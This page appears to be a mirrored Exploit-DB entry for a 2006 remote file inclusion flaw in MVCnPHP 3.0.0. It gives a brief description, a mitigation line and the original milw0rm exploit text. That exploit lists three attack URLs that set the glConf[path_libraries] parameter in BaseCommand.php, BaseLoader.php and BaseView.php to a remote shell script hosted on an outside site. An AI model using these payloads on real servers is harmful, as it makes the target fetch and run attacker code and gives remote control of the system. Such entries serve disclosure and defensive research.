header-logo
Suggest Exploit
vendor:
MVCnPHP
by:
Drago84
7,5
CVSS
HIGH
Remote File Inclusion
98
CWE
Product Name: MVCnPHP
Affected Version From: 3.0.0
Affected Version To: 3.0.0
Patch Exists: Yes
Related CWE: N/A
CPE: a:geeklog:mvcnphp:3.0.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

MVCnPHP Remote File Inclusion

MVCnPHP is vulnerable to remote file inclusion. The vulnerability exists in the BaseCommand.php, BaseLoader.php, and BaseView.php files. An attacker can exploit this vulnerability by sending a malicious URL to the vulnerable server. The malicious URL contains a malicious script which is then executed on the vulnerable server.

Mitigation:

The best way to mitigate this vulnerability is to ensure that user input is properly sanitized and validated before being used in the application.
Source

Exploit-DB raw data:

MVCnPHP Remote File Inclusion

############ToXiC CrEw###############

Bug Found by Drago84

Page  Sources:
http://freshmeat.net/redir/mvcnphp/46123/url_tgz/Geeklog_MVCnPHP-3.0.0.tgz

Page Affect:
BaseCommand.php
BaseLoader.php
BaseView.php

ExP:
http://server/dir_mvcnphp/BaseCommand.php?glConf[path_libraries]=http://evalsite.com/shell.php
http://server/dir_mvcnphp/BaseLoader.php?glConf[path_libraries]=http://evalsite.com/shell.php
http://server/dir_mvcnphp/BaseView.php?glConf[path_libraries]=http://evalsite.com/shell.php

# milw0rm.com [2006-08-10]

Navigation

Suggest Exploit

Services By CQR